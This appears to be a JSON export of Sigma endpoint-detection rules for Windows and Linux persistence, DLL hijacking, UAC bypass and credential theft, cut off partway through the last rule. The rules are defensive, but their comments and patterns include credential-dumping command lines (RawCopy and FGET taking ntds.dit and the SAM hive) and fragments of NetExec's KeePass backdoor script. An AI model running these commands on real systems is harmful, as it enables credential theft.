{ "id": "003481a2-e45e-44fd-9433-b13492669c31", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.076504Z", "creation_date": "2026-03-23T11:45:34.076506Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.076511Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/t1174-password-filter-dll", "https://attack.mitre.org/techniques/T1547/002/" ], "name": "t1547_002_persistence_lsa_authentication_package.yml", "content": "title: LSA Authentication Package Installed\nid: 003481a2-e45e-44fd-9433-b13492669c31\ndescription: |\n Detects the installation of a new authentication package via a registry modification.\n The LSA (Local Security Authority) is a critical Windows component responsible for managing security policies and authentication.\n Attackers may install these packages to gain elevated privileges or establish persistence.\n It is recommended to investigate the source of the configuration change, review the permissions and ownership of the affected LSA settings, and verify the legitimacy of the modification.\n If the change cannot be attributed to a legitimate process, consider rolling back the configuration.\nreferences:\n - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/t1174-password-filter-dll\n - https://attack.mitre.org/techniques/T1547/002/\ndate: 2020/09/22\nmodified: 2025/05/05\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n TargetObject:\n - 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Authentication Packages'\n - 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Authentication Packages'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_malwarebytes:\n Image: '?:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe'\n\n exclusion_scecli:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Authentication Packages'\n Details: 'scecli'\n\n exclusion_msv10:\n EventType: SetValue\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Authentication Packages'\n Details: 'msv1_0' # default value\n\n exclusion_known_fp:\n Details:\n - 'msv1_0'\n - 'msv1_0;sshdpinauthlsa' # C:\\WINDOWS\\system32\\SshdPinAuthLsa.dll, DLL from microsoft\n - 'msv1_0;ZenV1_0' # Novell ZENworks\n - 'msv1_0;nxlsa' # NoMachine S.a.r.l.\n - 'msv1_0;BvLsaEx' # BvSshServer-Inst.exe\n - 'msv1_0;teleport' # teleport-windows-auth-setup - Teleport RMM - https://goteleport.com/download/?product=connect&os=windows\n - 'msv1_0;CSALsubauth' # https://www.authlite.com/\n - 'msv1_0;wvauth' # Wave Systems Corp.\n - 'msv1_0;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n - 'msv1_0;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n - 'msv1_0;SshdPinAuthLsa;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n - 'msv1_0;SshdPinAuthLsa;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll;?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsAuthenticationPackage.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "003481a2-e45e-44fd-9433-b13492669c31", "rule_name": "LSA Authentication Package Installed", "rule_description": "Detects the installation of a new authentication package via a registry modification.\nThe LSA (Local Security Authority) is a critical Windows component responsible for managing security policies and authentication.\nAttackers may install these packages to gain elevated privileges or establish persistence.\nIt is recommended to investigate the source of the configuration change, review the permissions and ownership of the affected LSA settings, and verify the legitimacy of the modification.\nIf the change cannot be attributed to a legitimate process, consider rolling back the configuration.\n", "rule_creation_date": "2020-09-22", "rule_modified_date": "2025-05-05", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.persistence" ], "rule_technique_tags": [ "attack.t1112", "attack.t1547.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "006ebafe-6e79-4642-a76f-5073a4cc1bc5", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.098649Z", "creation_date": "2026-03-23T11:45:34.098651Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.098656Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_dnscacheugc.yml", "content": "title: DLL Hijacking via dnscacheugc.exe\nid: 006ebafe-6e79-4642-a76f-5073a4cc1bc5\ndescription: |\n Detects potential Windows DLL Hijacking via dnscacheugc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dnscacheugc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\IPHLPAPI.DLL'\n - '\\wdscore.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "006ebafe-6e79-4642-a76f-5073a4cc1bc5", "rule_name": "DLL Hijacking via dnscacheugc.exe", "rule_description": "Detects potential Windows DLL Hijacking via dnscacheugc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "0070bcf5-0b6e-40f9-9b07-baad4a18cf84", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.627344Z", "creation_date": "2026-03-23T11:45:34.627346Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.627350Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/jschicht/RawCopy", "http://blog.opensecurityresearch.com/2011/10/how-to-acquire-locked-files-from.html", "https://attack.mitre.org/techniques/T1006/" ], "name": "t1006_raw_access_files.yml", "content": "title: Files Accessed via Raw Device Access\nid: 0070bcf5-0b6e-40f9-9b07-baad4a18cf84\ndescription: |\n Detects raw access to files through tools like RawCopy or FGET.\n Attackers can raw access files to dump them and evade detection mechanisms, as well as bypass locked files.\n It is recommended to investigate the command-line arguments to check which file was accessed and to analyze the parent process for suspicious activities.\nreferences:\n - https://github.com/jschicht/RawCopy\n - http://blog.opensecurityresearch.com/2011/10/how-to-acquire-locked-files-from.html\n - https://attack.mitre.org/techniques/T1006/\ndate: 2022/10/19\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.RawCopy\n - classification.Windows.Tool.FGET\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # RawCopy.exe /FileNamePath:C:\\Windows\\NTDS\\ntds.dit /OutputPath:C:\\Windows\\Temp\\ntds.dit\n selection_rawcopy:\n LegalCopyright: 'Joakim Schicht'\n Description: 'Copy files from NTFS volumes by using low level disk access'\n CommandLine|contains: 'FileNamePath'\n\n # FGET.exe -extract C:\\Windows\\System32\\config\\SAM C:\\Windows\\Temp\\out.sam\n selection_fget:\n # Signed by HBGary, Inc\n # The certificate was explicitly revoked by its issuer\n Imphash: '72B17395940FD0266D2CBBF8EB32CF3C'\n CommandLine|contains: 'extract'\n\n # This is handled by the rule aaf113bc-6b63-46d3-919a-9b2a105bcd5f\n filter_sensitive_files:\n CommandLine|contains:\n - '\\Windows\\NTDS\\NTDS.dit'\n - '\\Windows\\System32\\config\\SAM'\n - '\\Windows\\System32\\config\\SECURITY'\n - '\\Windows\\System32\\config\\SYSTEM'\n\n exclusion_bmc:\n Ancestors|endswith: '?:\\Program Files\\BMC Software\\BladeLogic\\RSC\\RSCDsvc.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "0070bcf5-0b6e-40f9-9b07-baad4a18cf84", "rule_name": "Files Accessed via Raw Device Access", "rule_description": "Detects raw access to files through tools like RawCopy or FGET.\nAttackers can raw access files to dump them and evade detection mechanisms, as well as bypass locked files.\nIt is recommended to investigate the command-line arguments to check which file was accessed and to analyze the parent process for suspicious activities.\n", "rule_creation_date": "2022-10-19", "rule_modified_date": "2026-02-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1006" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "008189c4-a1fb-4a50-86ed-a178011f9cc2", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.077824Z", "creation_date": "2026-03-23T11:45:34.077826Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.077830Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/", "https://attack.mitre.org/techniques/T1548/002/" ], "name": "t1548_002_post_uac_bypass_sdclt.yml", "content": "title: UAC Bypass Executed via sdclt\nid: 008189c4-a1fb-4a50-86ed-a178011f9cc2\ndescription: |\n Detects an unusual process being spawned by sdclt.exe.\n This is action is probably the result of a UAC bypass attempt, prepared by setting specific values in thre registry.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\n It is recommended to investigate the detected process and its execution context to determine its legitimacy.\nreferences:\n - https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/10/12\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.Hijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\sdclt.exe'\n\n filter_common:\n Image:\n - '?:\\Windows\\System32\\sdclt.exe'\n - '?:\\Windows\\System32\\control.exe'\n - '?:\\Windows\\System32\\recdisc.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "008189c4-a1fb-4a50-86ed-a178011f9cc2", "rule_name": "UAC Bypass Executed via sdclt", "rule_description": "Detects an unusual process being spawned by sdclt.exe.\nThis is action is probably the result of a UAC bypass attempt, prepared by setting specific values in thre registry.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system to perform a task under administrator-level permissions.\nIt is recommended to investigate the detected process and its execution context to determine its legitimacy.\n", "rule_creation_date": "2020-10-12", "rule_modified_date": "2025-02-05", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1548.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "00a9c87a-2497-4d37-878f-7cb8f3560972", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.091095Z", "creation_date": "2026-03-23T11:45:34.091097Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.091102Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/keepass_trigger_module/AddKeePassTrigger.ps1", "https://attack.mitre.org/techniques/T1555/005/", "https://attack.mitre.org/techniques/T1059/001/" ], "name": "t1555_005_netexec_keepass.yml", "content": "title: KeePass Backdoored via NetExec\nid: 00a9c87a-2497-4d37-878f-7cb8f3560972\ndescription: |\n Detects a dump of a KeePass database made using the NetExec tools.\n NetExec is a tool intended to ease lateral movement, internal recon and credential gathering actions.\n It is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\nreferences:\n - https://github.com/Pennyw0rth/NetExec/blob/1af282888cd514cf9b4a08ff7caeb26c64625d90/nxc/data/keepass_trigger_module/AddKeePassTrigger.ps1\n - https://attack.mitre.org/techniques/T1555/005/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2024/07/23\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.005\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.HackTool.NetExec\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_add:\n PowershellCommand|contains|all:\n - '$Null = $KeePassXML.Configuration.Application.TriggerSystem.Triggers.AppendChild($KeePassXML.ImportNode($TriggerXML.Trigger, $True))'\n - \"$Null = $KeePassXML.Configuration.Application.TriggerSystem.ReplaceChild($Triggers, $KeePassXML.Configuration.Application.TriggerSystem.SelectSingleNode('Triggers'))\"\n - 'bES7XfGLTA2IzmXm6a0pig=='\n - 'D5prW87VRr65NO2xP5RIIg=='\n selection_remove:\n PowershellCommand|contains|all:\n - '$KeePassXML.Configuration.Application.TriggerSystem.Triggers.RemoveChild($Child)'\n - '$Children = $KeePassXML.Configuration.Application.TriggerSystem.Triggers | ForEach-Object {$_.Trigger} | Where-Object {$_.Name -like $TriggerName}'\n - \"if($KeePassXMLPath -and ($KeePassXMLPath -match '.\\\\.xml$') -and (Test-Path -Path $KeePassXMLPath) ) {\"\n selection_restart:\n PowershellCommand|contains|all:\n - \"if($KeePassXMLPath -and ($KeePassXMLPath -match '.\\\\.xml$') -and (Test-Path -Path $KeePassXMLPath) ) {\"\n - 'taskkill /F /T /IM keepass.exe /FI \"USERNAME eq $KeePassUser\"'\n condition: 1 of selection_*\nlevel: critical\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "00a9c87a-2497-4d37-878f-7cb8f3560972", "rule_name": "KeePass Backdoored via NetExec", "rule_description": "Detects a dump of a KeePass database made using the NetExec tools.\nNetExec is a tool intended to ease lateral movement, internal recon and credential gathering actions.\nIt is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\n", "rule_creation_date": "2024-07-23", "rule_modified_date": "2025-01-15", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access", "attack.execution" ], "rule_technique_tags": [ "attack.t1059.001", "attack.t1555.005" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "00d0b7b5-b0af-4d67-8658-5a08f0acf307", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.618852Z", "creation_date": "2026-03-23T11:45:34.618854Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.618858Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/xforcered/WFH", "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_infdefaultinstall.yml", "content": "title: DLL Hijacking via InfDefaultInstall.exe\nid: 00d0b7b5-b0af-4d67-8658-5a08f0acf307\ndescription: |\n Detects potential Windows DLL Hijacking via InfDefaultInstall.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'InfDefaultInstall.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\drvstore.dll'\n - '\\newdev.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "00d0b7b5-b0af-4d67-8658-5a08f0acf307", "rule_name": "DLL Hijacking via InfDefaultInstall.exe", "rule_description": "Detects potential Windows DLL Hijacking via InfDefaultInstall.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "00ecf213-801a-4ee0-b19d-fbe12001d4a3", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "low", "rule_effective_confidence": "weak", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-24T07:14:08.719555Z", "creation_date": "2026-03-23T11:45:34.612526Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.612534Z", "rule_level": "low", "rule_confidence": "weak", "rule_confidence_override": null, "references": [ "https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/", "https://attack.mitre.org/techniques/T1136/001/" ], "name": "t1136_001_useradd_linux.yml", "content": "title: User Created via useradd\nid: 00ecf213-801a-4ee0-b19d-fbe12001d4a3\ndescription: |\n Detects an attempt to create a new user using the useradd utility.\n Adversaries may create new users to hide their activity or achieve persistence.\n It is recommended to investigate whether the process has legitimate reasons to create a user as well as to look for possible suspicious activities on the host.\nreferences:\n - https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/\n - https://attack.mitre.org/techniques/T1136/001/\ndate: 2023/01/03\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.AccountManipulation\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/useradd'\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - '/usr/bin/python -Estt /usr/local/psa/bin/yum_install ' # Plesk'\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_rpm:\n - ProcessParentCommandLine|startswith: '/bin/sh /var/tmp/rpm-tmp.'\n - ProcessGrandparentCommandLine|startswith: '/bin/sh /var/tmp/rpm-tmp.'\n\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n\n # This command is different on debian distros\n exclusion_nxlog_redhat:\n ProcessCommandLine: 'useradd -r -g nxlog -d /var/spool/nxlog -s /sbin/nologin -c user for the nxlog log managment tool nxlog'\n\n exclusion_ossec:\n ProcessParentImage: '/var/ossec/bin/wazuh-modulesd'\n\n exclusion_puppet:\n ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_aws:\n ProcessCommandLine: '/bin/bash /var/lib/cloud/instance/scripts/part-001'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - 